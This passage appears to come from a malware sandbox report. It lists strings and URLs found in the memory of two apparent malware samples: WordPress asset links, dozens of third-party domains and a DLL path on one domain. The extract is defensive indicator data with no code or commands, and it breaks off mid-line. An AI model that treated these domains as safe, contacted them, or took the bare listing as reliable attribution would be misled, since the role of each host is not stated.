                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme/js/plugins/magnificpopup.min.js?ver=26.6
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme/js/plugins/visible.min.js?ver=26.6
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme/js/plugins/waypoints.min.js?ver=26.6
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme/js/scripts.js?ver=26.6
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.473713643.0000000005150000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.478763378.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/css/classic-themes.min.css?ver=1
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.473713643.0000000005150000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.478763378.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/css/dist/block-library/style.min.css?ver=6.1.1
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.1
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/jquery/ui/tabs.min.js?ver=1.13.2
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/wlwmanifest.xml
                      Source: iJzpyjAehB.exe, 00000000.00000003.347514573.0000000007564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.crcsi.org/
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.credo.edu.pl/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429302770.0000000008B00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435832282.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435550642.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434048283.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431188888.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429996077.0000000005580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431935732.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.crrcgc.cc/
                      Source: iJzpyjAehB.exe, 00000000.00000003.347142690.00000000075CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dayvo.com/
                      Source: pigalicapi.exe, 00000006.00000003.338019640.0000000007540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dgmna.com/
                      Source: pigalicapi.exe, 00000006.00000003.338019640.0000000007540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dgmna.com/u
                      Source: iJzpyjAehB.exe, 00000000.00000003.347142690.00000000075CA000.00000004.00000020.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.domon.com/
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.domon.com/%
                      Source: iJzpyjAehB.exe, 00000000.00000003.347514573.0000000007564000.00000004.00000020.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.511351222.0000000007578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.edimart.hu/
                      Source: iJzpyjAehB.exe, 00000000.00000003.347514573.0000000007564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.edimart.hu/o
                      Source: iJzpyjAehB.exe, 00000000.00000003.347514573.0000000007578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/
                      Source: iJzpyjAehB.exe, 00000000.00000003.347514573.0000000007578000.00000004.00000020.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.603177646.0000000007547000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.evcpa.com/
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.0000000007547000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.evcpa.com//
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.0000000007547000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.evcpa.com//M
                      Source: iJzpyjAehB.exe, 00000000.00000003.347514573.0000000007578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.evcpa.com/2
                      Source: iJzpyjAehB.exe, 00000000.00000002.600791524.000000000464D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.ex-olive.com
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.0000000007565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ex-olive.com/
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.0000000007565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ex-olive.com/h.dll
                      Source: iJzpyjAehB.exe, 00000000.00000003.347514573.0000000007564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fcwcvt.org/
                      Source: iJzpyjAehB.exe, 00000000.00000003.347142690.00000000075CA000.00000004.00000020.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.511351222.0000000007565000.00000004.00000020.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fe-bauer.de/
                      Source: iJzpyjAehB.exe, 00000000.00000003.347142690.00000000075CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fe-bauer.de/(
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.findbc.com/
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.findbc.com/r
                      Source: iJzpyjAehB.exe, 00000000.00000003.511351222.0000000007578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fink.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.511351222.0000000007578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fink.com/c
                      Source: iJzpyjAehB.exe, 00000000.00000002.585984260.0000000002DDD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.fnw.us
                      Source: iJzpyjAehB.exe, 00000000.00000002.585984260.0000000002DDD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.fnw.usP
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.freecasinogames.me/
                      Source: pigalicapi.exe, 00000006.00000003.338019640.0000000007540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ftchat.com/
                      Source: pigalicapi.exe, 00000006.00000003.338019640.0000000007540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ftchat.com/&
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429302770.0000000008B00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435832282.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435550642.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434048283.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431188888.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429996077.0000000005580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431935732.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com
                      Source: iJzpyjAehB.exe, 00000000.00000003.347514573.0000000007564000.00000004.00000020.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.347514573.0000000007564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/C
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429302770.0000000008B00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435832282.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435550642.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434048283.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431188888.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429996077.0000000005580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431935732.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/%E9%98%B2%E7%88%86%E6%97%A0%E7%BA%BFAP.html
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429302770.0000000008B00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435832282.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435550642.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434048283.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431188888.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429996077.0000000005580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431935732.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/145.html
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429302770.0000000008B00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435832282.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435550642.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 